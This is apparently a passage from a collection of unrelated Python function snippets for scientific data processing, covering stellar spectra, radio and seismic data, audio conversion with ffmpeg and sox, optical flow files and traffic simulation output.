This seems to help significant for faint visits\n lowsnr_visits=np.where(allvisit['SNR']<10)[0]\n if (len(lowsnr_visits) > 1) & (len(lowsnr_visits)/len(allvisit) > 0.1) :\n try :\n apstar_bc=visitcomb(allvisit,bconly=True,load=load,write=False,dorvfit=False) \n apstar_bc.setmask(badval)\n spec=doppler.Spec1D(apstar_bc.flux[0,:],err=apstar_bc.err[0,:],bitmask=apstar_bc.bitmask[0,:],\n mask=apstar_bc.mask[0,:],wave=apstar_bc.wave,lsfpars=np.array([0]),\n lsfsigma=apstar_bc.wave/22500/2.354,instrument='APOGEE',\n filename=apstar_bc.filename)\n print('running BC jointfit for :',obj)\n out= doppler.rv.jointfit([spec],verbose=verbose,plot=plot,tweak=tweak,maxvel=[-500,500])\n rvrange=[out[1][0]['vrel']-50,out[1][0]['vrel']+50]\n except :\n print(' BC jointfit failed')\n rvrange=[-500,500]\n elif allvisit['H'].max() > 13.5 : \n # if it's faint, restrict to +/- 500 km/s\n rvrange=[-500,500]\n else :\n # otherwise, restrict to +/ 1000 km/s\n rvrange=[-1000,1000]\n\n for i in range(len(allvisit)) :\n\n # load all of the visits into doppler Spec1D objects\n if load.telescope == 'apo1m' :\n visitfile= load.allfile('Visit',plate=allvisit['PLATE'][i],\n mjd=allvisit['MJD'][i],reduction=allvisit['APOGEE_ID'][i])\n else :\n visitfile= load.allfile('Visit',plate=int(allvisit['PLATE'][i]),\n mjd=allvisit['MJD'][i],fiber=allvisit['FIBERID'][i])\n spec=doppler.read(visitfile,badval=badval)\n\n if windows is not None :\n # if we have spectral windows to mask, do so here\n for ichip in range(3) :\n mask = np.full_like(spec.mask[:,ichip],True)\n gd = []\n for window in windows :\n gd.extend(np.where((spec.wave[:,ichip] > window[0]) & (spec.wave[:,ichip] < window[1]))[0])\n mask[gd] = False\n spec.mask[:,ichip] |= mask\n \n if spec is not None : speclist.append(spec)\n\n # now do the doppler jointfit to get RVs\n # dump empty pickle to stand in case of failure (to prevent redo if not clobber)\n try:\n # dump empty pickle to stand in case of failure (to prevent redo if not clobber)\n fp=open(outdir+'/'+obj+suffix+'.pkl','wb')\n pickle.dump(None,fp)\n fp.close()\n print('running jointfit for : {:s} rvrange:[{:.1f},{:.1f}] nvisits: {:d}'.format(obj,*rvrange,len(speclist)))\n out= doppler.rv.jointfit(speclist,maxvel=rvrange,verbose=verbose,\n plot=plot,saveplot=plot,outdir=outdir+'/',tweak=tweak)\n print('running decomp for :',obj)\n gout = gauss_decomp(out[1],phase='two',filt=True)\n fp=open(outdir+'/'+obj+suffix+'.pkl','wb')\n pickle.dump([out,gout],fp)\n fp.close()\n print('running plots for :',obj,outdir)\n try : os.makedirs(outdir+'/plots/')\n except : pass\n dop_plot(outdir+'/plots/',obj,out,decomp=gout)\n except KeyboardInterrupt : \n raise\n except ValueError as err:\n print('Exception raised in dorv for: ', field, obj)\n print(\"ValueError: {0}\".format(err))\n return\n except RuntimeError as err:\n print('Exception raised in dorv for: ', field, obj)\n print(\"Runtime error: {0}\".format(err))\n return\n except :\n raise\n print('Exception raised in dorv for: ', field, obj)\n return\n\n # return summary RV info, visit RV info, decomp info \n return [out[0:2],gout]", "def dirToRAD(directory, toFile):\n #Open Directory\n trainFiles = [file for file in os.listdir(directory) if file.endswith(\".txt\")]\n fOut = open(toFile, 'w')\n for file in trainFiles:\n print(file)\n rawData = getRawData(directory+file)\n if 'rad' in toFile:\n data = rawToRAD(rawData)\n elif 'cust' in toFile:\n data = rawToCust(rawData)\n else:\n print('ERROR. Transformation to ' + toFile + ' failed. 
Please enter a string containing cust for custom representation or rad for RAD format.')\n #print('Raw:', rawData)\n #print('RAD:', RADdata)\n label = int(file[1:3])\n if len(sys.argv) > 1:\n enumData = enumerate(getHistogram(data, file, int(sys.argv[1])))\n else:\n enumData = enumerate(getHistogram(data, file))\n fOut.write(str(label) + ' ')\n fOut.writelines([\" %d:%s\" % (index+1, elem) for index,elem in enumData])\n fOut.write('\\n')\n fOut.close()", "def rebin_spectra(source):\n # Unpack arguments using the 'source' label; all are assumed to be in km/s\n v_lo, v_hi, new_dv = velocity_ranges[source]\n # Load data cube\n data_filename = os.path.abspath(data_filepaths[source])\n cube = SpectralCube.read(data_filename)\n # Check units\n try:\n # See if the cube can be converted to Kelvins easily\n cube = cube.to(u.K)\n except:\n # Check if it looks like a temperature\n old_bunit = cube.header['BUNIT']\n if \"K (Ta*)\" in old_bunit:\n cube._unit = u.K\n print(f\"Data unit {cube.unit} assigned, based on the header BUNIT {old_bunit}.\")\n else:\n # Don't bother trying to fix it, leave it alone\n print(f\"Data units <{cube._unit}> aren't equivalent to Kelvins, leaving them alone\")\n # Get current channel width (np.diff should return an array of all the same value, so np.mean is overkill but it doesn't matter)\n old_dv = np.mean(np.diff(cube.spectral_axis))\n # Construct a box filter to average the channels\n # Filter width is number of channels; if rebinning from 0.1 km/s to 1 km/s, filter is 10 channels\n # Need to add km/s units to new_dv (old_dv already has units)\n filter_width = np.abs(((new_dv*u.km/u.s) / old_dv).decompose().to_value())\n # Round to nearest integer\n filter_width = np.around(filter_width, 0)\n # Make filter using astropy.convolution.Box1DKernel\n filter = Box1DKernel(filter_width)\n # Define the new spectral axis using the inclusive limits and the new channel width\n new_spectral_axis = np.arange(v_lo, v_hi+new_dv, new_dv) * u.km/u.s\n\n # Do the computationally intensive work\n print(\"Starting spectral smooth\")\n cube = cube.spectral_smooth(filter)\n print(\"Finished spectral smooth. 
Starting spectral rebin.\")\n cube = cube.spectral_interpolate(new_spectral_axis)\n print(\"Finished spectral rebin.\")\n # Create savename with \"rebin\" and the channel width inserted before the filetype suffix\n save_filename = data_filename.replace(\".fits\", f\".rebin{new_dv:d}kms.fits\")\n cube.write(save_filename, format='fits')", "def make(input_filepath, output_filepath) -> None:\n logger = logging.getLogger(__name__)\n logger.info('making final data set from raw data')", "def flow_write(filename,uv,v=None):\n TAG_CHAR = 'PIEH'\n nBands = 2\n\n if v is None:\n assert(uv.ndim == 3)\n assert(uv.shape[2] == 2)\n u = uv[:,:,0]\n v = uv[:,:,1]\n else:\n u = uv\n\n assert(u.shape == v.shape)\n height,width = u.shape\n f = open(filename,'wb')\n # write the header\n f.write(TAG_CHAR)\n np.array(width).astype(np.int32).tofile(f)\n np.array(height).astype(np.int32).tofile(f)\n # arrange into matrix form\n tmp = np.zeros((height, width*nBands))\n tmp[:,np.arange(width)*2] = u\n tmp[:,np.arange(width)*2 + 1] = v\n tmp.astype(np.float32).tofile(f)\n f.close()", "def flow_write(filename,uv,v=None):\n nBands = 2\n\n if v is None:\n assert(uv.ndim == 3)\n assert(uv.shape[2] == 2)\n u = uv[:,:,0]\n v = uv[:,:,1]\n else:\n u = uv\n\n assert(u.shape == v.shape)\n height,width = u.shape\n f = open(filename,'wb')\n TAG_CHAR = b'PIEH'\n f.write(TAG_CHAR)\n np.array(width).astype(np.int32).tofile(f)\n np.array(height).astype(np.int32).tofile(f)\n # arrange into matrix form\n tmp = np.zeros((height, width*nBands))\n tmp[:,np.arange(width)*2] = u\n tmp[:,np.arange(width)*2 + 1] = v\n tmp.astype(np.float32).tofile(f)\n f.close()", "def modconvert(infile, outfile, scale_factor=1.0):\n index, freq, brightness_temp, flux, rj_temp = read_infile(infile)\n\n wave, flux, temp = sort_spectrum(freq, flux, brightness_temp)\n\n scaled_flux = scale_factor * flux\n\n plot_scaled_spectrum(wave, scaled_flux, scale_factor, infile)\n\n write_scaled_spectrum(wave, scaled_flux, scale_factor, temp,\n infile, outfile)\n\n model = pd.DataFrame({'wavelength': wave, 'flux': scaled_flux,\n 't_br': temp})\n return model", "def spectrum_parser():\n from tools import file_importer, file_outporter\n from random import random\n # from math import log10\n \n print(\"this is spectrum parser\")\n \n relPath = \"bob/processed/OST-24-05-2017_combined.csv\"\n outPath = \"bob/processed/OST-24-05-2017_combined_no0_spectrum.csv\"\n inpF = file_importer(relPath)\n outF = file_outporter(outPath) \n headerFlag = True\n rowCount = 0\n for inpLine in inpF:\n if headerFlag: \n headerFlag = False\n spColCount = 0\n inpList = inpLine.split(\"\\t\")\n for headerI in inpList:\n if \"Peptides ST-1|Peptides ST-2|Peptides ST-3\" == headerI:\n break\n else: spColCount += 1\n outF.write(\"ID,Protein ID, Gene name,\") # write header into output file\n for headI in inpList[spColCount].split(\"|\"):\n outF.write(headI + \",\")\n for headI in inpList[spColCount + 1].split(\"|\")[:-1]:\n outF.write(headI + \",\")\n outF.write(inpList[spColCount + 1].split(\"|\")[-1] + \"\\n\")\n rowCount += 1\n continue\n \n outF.write(str(rowCount) + \",\")\n \n inpLine = inpLine.strip()\n inpItems = inpLine.split(\"\\t\")\n inpName = max(inpItems[0].split(\"|\"), key=len) # get unique protein ID\n inpGeneName = max(inpItems[6].split(\"|\"), key=len) # and gene name\n outF.write(inpName + \",\" + inpGeneName + \",\")\n \n inpSP = inpItems[spColCount].split(\"|\") + inpItems[spColCount + 1].split(\"|\") # get lfq intensity scores\n # print inpSP\n for lfqI in inpSP[:-1]: # write 
lfq values\n if lfqI == \"_\" or lfqI == \"0\":\n outF.write(str(random()) + \",\") ################## try with log10 values this time\n else:\n try:\n outF.write(str(lfqI) + \",\")\n except ValueError:\n print(inpItems)\n raise\n \n if inpSP[-1] == \"_\" or inpSP[-1] == \"0\": outF.write(str(random()) + \"\\n\")\n else: outF.write(inpSP[-1] + \"\\n\")\n \n \n \n rowCount += 1", "def read_raytomo_dbase(self, inh5fname, runid, dtype='ph', wtype='ray', create_header=True, Tmin=-999, Tmax=999, verbose=False):\n if dtype is not 'ph' and dtype is not 'gr':\n raise ValueError('data type can only be ph or gr!')\n if wtype is not 'ray' and wtype is not 'lov':\n raise ValueError('wave type can only be ray or lov!')\n stalst = self.waveforms.list()\n if len(stalst) == 0:\n print 'Inversion with surface wave datasets only, not added yet!'\n return\n indset = h5py.File(inh5fname)\n #--------------------------------------------\n # header information from input hdf5 file\n #--------------------------------------------\n dataid = 'reshaped_qc_run_'+str(runid)\n pers = indset.attrs['period_array']\n grp = indset[dataid]\n isotropic = grp.attrs['isotropic']\n org_grp = indset['qc_run_'+str(runid)]\n minlon = indset.attrs['minlon']\n maxlon = indset.attrs['maxlon']\n minlat = indset.attrs['minlat']\n maxlat = indset.attrs['maxlat']\n if isotropic:\n print 'isotropic inversion results do not output gaussian std!'\n return\n dlon_HD = org_grp.attrs['dlon_HD']\n dlat_HD = org_grp.attrs['dlat_HD']\n dlon = org_grp.attrs['dlon']\n dlat = org_grp.attrs['dlat']\n if create_header:\n inv_header = {'minlon': minlon, 'maxlon': maxlon, 'minlat': minlat, 'maxlat': maxlat,\n 'dlon': dlon, 'dlat': dlat, 'dlon_HD': dlon_HD, 'dlat_HD': dlat_HD}\n self.add_auxiliary_data(data=np.array([]), data_type='Header', path='raytomo', parameters=inv_header)\n self._get_lon_lat_arr(path='raytomo', hd=True)\n for staid in stalst:\n netcode, stacode = staid.split('.')\n staid_aux = netcode+'_'+stacode\n stla, elev, stlo = self.waveforms[staid].coordinates.values()\n if stlo < 0.:\n stlo += 360.\n if stla > maxlat or stla < minlat or stlo > maxlon or stlo < minlon:\n print 'WARNING: station: '+ staid+', lat = '+str(stla)+' lon = '+str(stlo)+', out of the range of tomograpic maps!'\n continue\n disp_v = np.array([])\n disp_un = np.array([])\n T = np.array([])\n #-----------------------------\n # determine the indices\n #-----------------------------\n ind_lon = np.where(stlo<=self.lons)[0][0]\n find_lon = ind_lon \n ind_lat = np.where(stla<=self.lats)[0][0]\n find_lat = ind_lat\n # point 1\n distmin, az, baz = obspy.geodetics.gps2dist_azimuth(stla, stlo, self.lats[ind_lat], self.lons[ind_lon]) # distance is in m\n # point 2\n dist, az, baz = obspy.geodetics.gps2dist_azimuth(stla, stlo, self.lats[ind_lat], self.lons[ind_lon-1]) # distance is in m\n if dist < distmin:\n find_lon = ind_lon-1\n distmin = dist\n # point 3\n dist, az, baz = obspy.geodetics.gps2dist_azimuth(stla, stlo, self.lats[ind_lat-1], self.lons[ind_lon]) # distance is in m\n if dist < distmin:\n find_lat = ind_lat-1\n distmin = dist\n # point 4\n dist, az, baz = obspy.geodetics.gps2dist_azimuth(stla, stlo, self.lats[ind_lat-1], self.lons[ind_lon-1]) # distance is in m\n if dist < distmin:\n find_lat = ind_lat-1\n find_lon = ind_lon-1\n distmin = dist\n for per in pers:\n if per < Tmin or per > Tmax:\n continue\n try:\n pergrp = grp['%g_sec'%( per )]\n vel = pergrp['vel_iso_HD'].value\n vel_sem = pergrp['vel_sem_HD'].value\n except KeyError:\n if verbose:\n print 'No data 
for T = '+str(per)+' sec'\n continue\n T = np.append(T, per)\n disp_v = np.append(disp_v, vel[find_lat, find_lon])\n disp_un = np.append(disp_un, vel_sem[find_lat, find_lon])\n data = np.zeros((3, T.size))\n data[0, :] = T[:]\n data[1, :] = disp_v[:]\n data[2, :] = disp_un[:]\n disp_header = {'Np': T.size}\n self.add_auxiliary_data(data=data, data_type='RayDISPcurve', path=wtype+'/'+dtype+'/'+staid_aux, parameters=disp_header)\n indset.close()\n return", "def preprocess_sample(file, params):\n\n videoFile = file + \".mp4\"\n audioFile = file + \".wav\"\n roiFile = file + \".png\"\n visualFeaturesFile = file + \".npy\"\n\n roiSize = params[\"roiSize\"]\n normMean = params[\"normMean\"]\n normStd = params[\"normStd\"]\n vf = params[\"vf\"]\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n\n #Extract the audio from the video file using the FFmpeg utility and save it to a wav file.\n v2aCommand = \"ffmpeg -y -v quiet -i \" + videoFile + \" -ac 1 -ar 16000 -vn \" + audioFile\n os.system(v2aCommand)\n\n\n #for each frame, resize to 224x224 and crop the central 112x112 region\n captureObj = cv.VideoCapture(videoFile)\n roiSequence = list()\n while (captureObj.isOpened()):\n ret, frame = captureObj.read()\n if ret == True:\n grayed = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)\n grayed = grayed/255\n grayed = cv.resize(grayed, (224,224))\n roi = grayed[int(112-(roiSize/2)):int(112+(roiSize/2)), int(112-(roiSize/2)):int(112+(roiSize/2))]\n roiSequence.append(roi)\n else:\n break\n captureObj.release()\n cv.imwrite(roiFile, np.floor(255*np.concatenate(roiSequence, axis=1)).astype(np.int))\n\n\n #normalise the frames and extract features for each frame using the visual frontend\n #save the visual features to a .npy file\n inp = np.stack(roiSequence, axis=0)\n inp = np.expand_dims(inp, axis=[1,2])\n inp = (inp - normMean)/normStd\n inputBatch = torch.from_numpy(inp)\n inputBatch = (inputBatch.float()).to(device)\n vf.eval()\n with torch.no_grad():\n outputBatch = vf(inputBatch)\n out = torch.squeeze(outputBatch, dim=1)\n out = out.cpu().numpy()\n np.save(visualFeaturesFile, out)\n return", "def preprocess(self, name, input_file, observation):\n\n lba = LBAFile(input_file, self.sample_rate)\n\n if self.max_samples > 0:\n # User specified max number of samples\n max_samples = min(self.max_samples, lba.max_samples)\n else:\n max_samples = lba.max_samples\n\n # Length of the observation for the number of samples we're reading\n obs_length = lba.obs_length(max_samples)\n start = lba.obs_start\n end = start + datetime.timedelta(seconds=obs_length)\n\n LOG.info(\"LBA obs time: start {0} end {1} duration {2} sec\".format(start, end, obs_length))\n\n observation.observation_name = os.path.basename(name)\n observation.additional_metadata = json.dumps(lba.header)\n observation.antenna_name = self.antenna_name if self.antenna_name is not None else lba.header.get('ANTENNANAME', '')\n observation.sample_rate = self.sample_rate\n observation.length_seconds = obs_length\n observation.start_time = start.timestamp()\n observation.num_channels = lba.num_channels\n observation.num_samples = max_samples\n\n channel_map = None\n if self.obs_filename is not None:\n try:\n vex = pyvex.Vex(self.obs_filename)\n self._fill_source_array(observation, vex, start, end, max_samples)\n\n # Get channel info from the VEX file.\n # Pick the appropriate mode from the vex file. We run with the assumption for now that there's only one\n # mode, and get everything from it. 
If there are multiple modes, then error out\n if len(vex.modes) == 0:\n LOG.warning(\"No modes in vex file to get channel info from\")\n elif len(vex.modes) > 1:\n LOG.error(\"Cannot get channel information from vex file because multiple modes are present. This is currently unsupported\")\n else:\n # Get antenna info\n antenna = next((a for a in vex.antennas if a.def_name == self.antenna_name), None)\n if antenna is None:\n LOG.error(\"Specified antenna def name {0} is not present in the vex file\".format(self.antenna_name))\n else:\n LOG.info(\"Found antenna def name {0}. Name {1}\".format(self.antenna_name, antenna.name))\n mode = vex.modes[0]\n setup = mode.setups[antenna.name]\n channel_map = [[channel, mode.subbands[channel.subband_id], setup.ifs[\"IF_{0}\".format(channel.if_name)]] for channel in setup.channels]\n # TODO: I'm unsure if this is correct or what order we should use here\n # - Ordering by subband_id will match the CH0(0-8) ordering present in the vex file.\n # - Ordering by record_chan seems to make some logic sense as it orders them from low to\n # high frequency across pol R then pol L. It also orders the BBC values ascending.\n # - Neither of these seem to match the observation_details.md table.\n\n # TODO: For now, I'll assume sorting by record chan\n channel_map.sort(key=lambda c: c[0].record_chan)\n\n except Exception as e:\n LOG.error(\"Failed to parse vex file {0}\".format(e))\n\n samples_read = 0\n while samples_read < max_samples:\n remaining_samples = max_samples - samples_read\n samples_to_read = min(remaining_samples, self.chunk_size)\n samples = lba.read(samples_read, samples_to_read)\n\n for channel_index in range(samples.shape[1]):\n # Loop over each channel, then either output the channel directly\n # into the HDF5 file, or get the channel info to get the appropriate metadata\n # for the channel, then output that.\n\n channel_name = \"channel_{0}\".format(channel_index)\n\n out_channel = observation[channel_name]\n if out_channel is None:\n out_channel = observation.create_channel(channel_name, shape=(max_samples,), dtype=np.int8)\n if channel_map is not None:\n vex_channel, vex_subband, vex_if = channel_map[channel_index]\n # Add info from the vex file to the channel\n out_channel.freq_start = vex_channel.bbc_freq\n out_channel.freq_end = vex_channel.bbc_freq + vex_channel.bbc_bandwidth\n out_channel.additional_metadata = json.dumps({\n 'channel_name': vex_channel.name,\n 'polarisation': vex_subband.pol.decode('utf-8'),\n 'bbc_name': vex_channel.bbc_name,\n 'record_chan': vex_channel.record_chan,\n 'subband_id': vex_channel.subband_id,\n 'vlba_band_name': vex_if.vlba_band_name,\n 'if_sslo': vex_if.if_sslo,\n 'lower_edge_freq': vex_if.lower_edge_freq\n }, indent=4)\n data = samples[:, channel_index]\n out_channel.write_data(samples_read, data)\n\n samples_read += samples_to_read\n\n if (samples_read // self.chunk_size) % 10 == 0:\n LOG.info(\"{0:.2%} {1}/{2}\".format(samples_read / max_samples, samples_read, max_samples))\n\n LOG.info(\"LBA preprocessor complete\")", "def createOutput():\n\n firstPeriod = True\n # get edge No\n edgesNo = 0\n edgesSet = set()\n for timestep, taxiList in vtypeDict.iteritems():\n for tup in taxiList:\n edgesSet.add(tup[1])\n edgesNo = len(edgesSet)\n\n outputFile = open(path.FQoutput, 'w')\n outputFile.write('<?xml version=\"1.0\"?>\\n')\n outputFile.write('<paramEffects aggregationInterval=\"%d\" vehicles=\"%d\" edges=\"%d\">\\n' % (\n aggInterval, vehSum, edgesNo))\n for period, quota, vtypeDictR, taxiSum in 
generatePeriodQuotaSets(True):\n if quota is None:\n if not firstPeriod:\n outputFile.write(\"\\t</periods>\\n\")\n else:\n firstPeriod = False\n outputFile.write('\\t<periods period=\"%d\">\\n' % (period))\n else:\n simpleTaxiMeanVList = [0, 1]\n simpleEdgeMeanVList = [0, 1]\n drivenEdgesSet = set()\n\n if len(vtypeDictR) == 0: # if the processed FCD returns no Values\n print(\"noData p\", period, \" q\", quota)\n drivenEdgesSet.add(0)\n else: # create mean from all taxi speed values\n for timestep, taxiList in vtypeDictR.iteritems():\n for tup in taxiList: # all elements in this timestep\n simpleTaxiMeanVList[0] += tup[2]\n simpleTaxiMeanVList[1] += 1\n drivenEdgesSet.add(tup[1])\n # create mean from all edge speed values which are driven by the\n # chosen taxis\n drivenEdgesList = list(drivenEdgesSet)\n drivenEdgesList.sort()\n # print \"dataSets \",simpleTaxiMeanVList[1]\n\n # --edgeDump-- #\n \"\"\"\n for i in edgeDumpDict.keys(): #all intervals\n for edge,v in edgeDumpDict[i]:\n if BinarySearch.isElmInList(drivenEdgesList,edge):\n simpleEdgeMeanVList[0]+=v\n simpleEdgeMeanVList[1]+=1\n \"\"\"\n # --vtype-- #\n\n for timestep, taxiList in vtypeDict.iteritems():\n for tup in taxiList:\n if BinarySearch.isElmInList(drivenEdgesList, tup[1]):\n simpleEdgeMeanVList[0] += tup[2]\n simpleEdgeMeanVList[1] += 1\n\n # calc values for output\n detectedEdges = len(drivenEdgesSet)\n relDetectedEdges = detectedEdges * 100.0 / edgesNo\n vSim = simpleEdgeMeanVList[0] / simpleEdgeMeanVList[1]\n vSimFCD = simpleTaxiMeanVList[0] / simpleTaxiMeanVList[1]\n vAbsDiff = vSimFCD - vSim\n if vSim != 0:\n vRelDiff = vAbsDiff / vSim * 100\n else:\n vRelDiff = 100\n if vRelDiff < -40:\n vRelDiff = -35\n\n outputFile.write('\\t\\t<values taxiQuota=\"%f\" taxis=\"%d\" simMeanSpeed=\"%f\" simFcdMeanSpeed=\"%f\" ' % (\n quota, taxiSum, vSim, vSimFCD,))\n outputFile.write('detectedEdges=\"%d\" notDetectedEdges=\"%d\" ' % (\n detectedEdges, edgesNo - detectedEdges))\n outputFile.write('absSpeedDiff=\"%f\" relSpeedDiff=\"%f\" relDetectedEdges=\"%f\" relNotDetectedEdges=\"%f\"/>\\n' %\n (vAbsDiff, vRelDiff, relDetectedEdges, 100 - relDetectedEdges))\n outputFile.write(\"\\t</periods>\\n</paramEffects>\")\n outputFile.close()", "def build_spectrum(spectrum_filename):\n hdulist = fits.open(spectrum_filename)\n data = hdulist[1].data\n \n spec = Spectrum(data['wave'], data['flux'], data['error'])\n \n return spec", "def t8_loadFile(self):\n print \"spectrumFile\"\n filename = tkFileDialog.askopenfilename()\n filename = self.filenameparser(filename)\n self.t8_filename = filename", "def register(\n sample_file,\n select,\n src=dstain.config.DATA_RAW,\n output=dstain.config.REGISTRATION,\n window=512,\n downsample=1,\n patches=0,\n zip_patches=False,\n verbose=True,\n thumbnail_downsample=128,\n nfeatures=5000,\n ransacreprojthreshold=25,\n affine=True):\n\n # Reading list of files in each sample\n # samples[key] = value\n # key is the name of the sample\n # value is a list of filenames\n samples = dstain.utils.read_sample_file(sample_file, use_split=False)\n\n # Allow subselection of samples to register\n if select == ():\n select = sorted(samples.keys())\n\n # Loop through samples\n for (i, sample) in enumerate(select):\n print(\"Sample #{} / {}: {}\".format(i + 1, len(select), sample), flush=True)\n dstain.utils.register.register_sample(\n src, os.path.join(output, sample), samples[sample], window, downsample,\n patches, zip_patches, verbose, thumbnail_downsample, nfeatures, ransacreprojthreshold, affine)", "def 
test_process_5_1_surround_file(self):\n test_path = pathlib.Path(__file__).parent.absolute() / 'data/surround.wav'\n self.default_kwargs['input_file'] = test_path\n self.encoder = FileEncoder(**self.default_kwargs)\n self.encoder.process()", "def fromFile(self,fn = None):\n\n while True:\n\n if fn == None:\n fn = getFilename(\"Spectrometer file\",\"spec\")\n else:\n fn = getExpandedFilename(fn) # Sort out logicals\n if not fn.endswith(\"spec\"): # Append \".spec\" if not given\n fn += \".spec\"\n\n try:\n sfile= open(fn,\"r\") # open file\n lines = sfile.readlines()\n sfile.close()\n break\n except FileNotFoundError:\n getLogger().error(\"Failed to find spectrometer file : \" + str(fn))\n fn = None\n\n\n # read file and process one line at a time\n #\n\n # Read through line at a time\n for line in lines:\n\n line = line.strip()\n if not line.startswith(\"#\") and len(line) > 0: # Kill comments and blanks\n token = line.split()\n\n if token[0].startswith(\"point\"):\n v = eval(token[1])\n self.setPoint(v)\n\n elif token[0].startswith(\"index\"):\n self.setIndex(token[1])\n\n elif token[0].startswith(\"angle\"):\n self.angle = math.radians(float(token[1]))\n self.setTilt(self.tilt) # Reset surfaces\n\n elif token[0].startswith(\"height\"):\n self.height = float(token[1])\n\n elif token[0].startswith(\"beam\"):\n self.beam = float(token[1])\n\n elif token[0].startswith(\"tilt\"):\n self.setTilt(math.radians(token[1]))\n\n elif token[0].startswith(\"setup\"):\n self.setUpWavelength(float(token[1]))\n\n else:\n raise ValueError(\"Sprectometer: illegal key : {0:s}\".format(token[0]))\n\n return self", "def mono(filename,wout=True):\n n, data, data_dB,sr,ch=inputwav(filename)\n if ch==2:\n print('Converting to mono...')\n L=data[:,0]\n R=data[:,1]\n n=len(data)\n data_m=np.zeros((n,1))\n data_m=L/2.0+R/2.0\n if wout==True:\n print('Exporting...')\n sf.write(filename[0:len(filename)-4]+'_mono.wav',data_m,sr,'PCM_16')\n print('Done!')\n return data_m\n else:\n print( \"Error: input is already mono stoooooooooopid!\")", "def load(filename):\n root,ext = _os_path.splitext(filename)\n loader = LOADER[ext]\n frequency,raw_signal = loader(filename)\n iinfo = _numpy.iinfo(raw_signal.dtype)\n raw_signal_midpoint = (iinfo.max + iinfo.min)/2.\n raw_signal_range = iinfo.max - raw_signal_midpoint\n unit_output_signal = (raw_signal - raw_signal_midpoint)/raw_signal_range\n return (frequency, unit_output_signal)", "def __convert_single_only_au_AutoVC_format_to_dataset__(self, filename, build_train_dataset=True):\n\n global_clip_index, video_name = filename\n\n # audio_file = os.path.join(self.src_dir, 'raw_wav', '{}.wav'.\n # format(video_name[:-4]))\n audio_file = os.path.join(self.src_dir, 'raw_wav', '{:05d}_{}_audio.wav'.\n format(global_clip_index, video_name[:-4]))\n if(not build_train_dataset):\n import shutil\n audio_file = os.path.join(self.src_dir, 'raw_wav', '{:05d}_{}_audio.wav'.\n format(global_clip_index, video_name[:-4]))\n shutil.copy(os.path.join(self.src_dir, 'test_wav_files', video_name), audio_file)\n\n sound = AudioSegment.from_file(audio_file, \"wav\")\n normalized_sound = match_target_amplitude(sound, -20.0)\n normalized_sound.export(audio_file, format='wav')\n\n from third_party.autovc.retrain_version.vocoder_spec.extract_f0_func import extract_f0_func_audiofile\n S, f0_norm = extract_f0_func_audiofile(audio_file, 'M')\n\n from third_party.autovc.utils import quantize_f0_interp\n f0_onehot = quantize_f0_interp(f0_norm)\n\n from third_party.resemblyer_util.speaker_emb import get_spk_emb\n 
mean_emb, _ = get_spk_emb(audio_file)\n\n return S, mean_emb, f0_onehot", "def fix_file(file_path: str, output_path_fixed: str, target_rate: int=16000,\n channels: int=1, output_path: str=None, min_duration: int=None,\n verbose_level: int=0):\n file_name = file_path.split(os.sep)[-1]\n new_file_path = output_path_fixed + os.sep + file_name\n\n try:\n # Get the audio length\n out = syscommand.system('soxi -D ' + file_path)\n duration = float(out)\n # Get the number of channels\n out = syscommand.system('soxi -c ' + file_path)\n current_n_channels = int(out)\n # Get the current rate\n out = syscommand.system('soxi -r ' + file_path)\n current_rate = int(out)\n if min_duration is not None and duration < min_duration:\n raise Exception(\"Minimum length not satisfied\")\n except Exception as err:\n if str(verbose_level) != '0':\n print(err)\n return None, file_path\n\n if current_rate != target_rate and current_n_channels != channels:\n speed = float(current_rate) / float(target_rate)\n cmd = 'sox -V{} -r 16k {} {} channels 1 ' \\\n 'speed {}'.format(verbose_level, file_path, new_file_path,\n speed)\n if str(verbose_level) == '2':\n print(cmd)\n os.system(cmd)\n return new_file_path, file_path\n elif current_rate != target_rate:\n speed = float(current_rate) / float(target_rate)\n cmd = 'sox -V{} -r 16k {} {} ' \\\n 'speed {}'.format(verbose_level, file_path, new_file_path,\n speed)\n if str(verbose_level) == '2':\n print(cmd)\n os.system(cmd)\n return new_file_path, file_path\n elif current_n_channels != channels:\n cmd = 'sox -V{} {} {} channels 1'.format(verbose_level, file_path,\n new_file_path)\n if str(verbose_level) == '2':\n print(cmd)\n os.system(cmd)\n return new_file_path, file_path\n\n # Copy file if output path were provided and the file is not there\n if output_path is not None:\n copyfile(file_path, new_file_path)\n return file_path, file_path", "def normalize_to_std_grid(self, inputs, resamplemethod = 'nearest'):\n outputs = []\n npy_outputs = []\n if resamplemethod == 'nearest':\n rs = Resampling.nearest\n else:\n print('only nearest neighbor resampling is supported at this time')\n sys.exit(0)\n\n for i, warpfile in enumerate(inputs):\n print('warpfile', warpfile)\n with rasterio.open(warpfile) as src:\n # create the virtual raster based on the standard rasterio attributes from the sample tiff and shapefile feature.\n with WarpedVRT(src, resampling=rs,\n crs=self.crs,\n transform=self.transform,\n height=self.rows,\n width=self.cols) as vrt:\n data = vrt.read()\n print(type(vrt))\n # save the file as an enumerated tiff. 
reopen outside this loop with the outputs list\n outwarp = os.path.join(self.temp_folder, 'temp_{}.tif'.format(i))\n rio_shutil.copy(vrt, outwarp, driver='GTiff')\n outputs.append(outwarp)\n\n # output each virtual file as a temporary .tif file in a temp folder somewhere in the outputs directory.\n # for each file in the temp directory read in the raster as a numpy array and return the list of numpy arrays\n # from this method for us in the rest of the code.\n for ow in outputs:\n with rasterio.open(ow, 'r') as src:\n arr = src.read(1)\n npy_outputs.append(arr)\n\n return npy_outputs", "def read_ultrasound_file(ult_file):\n\n return np.fromfile(open(ult_file, \"rb\"), dtype=np.uint8)", "def generate_rsat_bg_file(input_file_path, output_file_path, strand_type):\n cmd = [\"sh\", \"generate_rsat_bg_file.sh\",\n \"-i\", input_file_path,\n \"-o\", output_file_path,\n \"-s\", strand_type]\n process = subprocess.Popen(cmd, stdout=subprocess.PIPE)\n process.wait()", "def single_file(filename, exposure_times, osc_start, osc_width, epoch):\n index = scan_helper_image_files.image_to_index(os.path.split(filename)[-1])\n if epoch is None:\n epoch = 0.0\n\n # if the oscillation width is negative at this stage it is almost\n # certainly an artefact of the omega end being 0 when the omega start\n # angle was ~ 360 so it would be ~ -360 - see dxtbx#378\n if osc_width < -180:\n osc_width += 360\n\n return ScanFactory.make_scan(\n (index, index), exposure_times, (osc_start, osc_width), {index: epoch}\n )", "def t4_loadFile(self):\n print \"subspectrumFile\"\n filename = tkFileDialog.askopenfilename()\n filename = \"SubSpectrumData/\" + self.filenameparser(filename)\n self.t4_filename = filename", "def __init__(self, in_file: 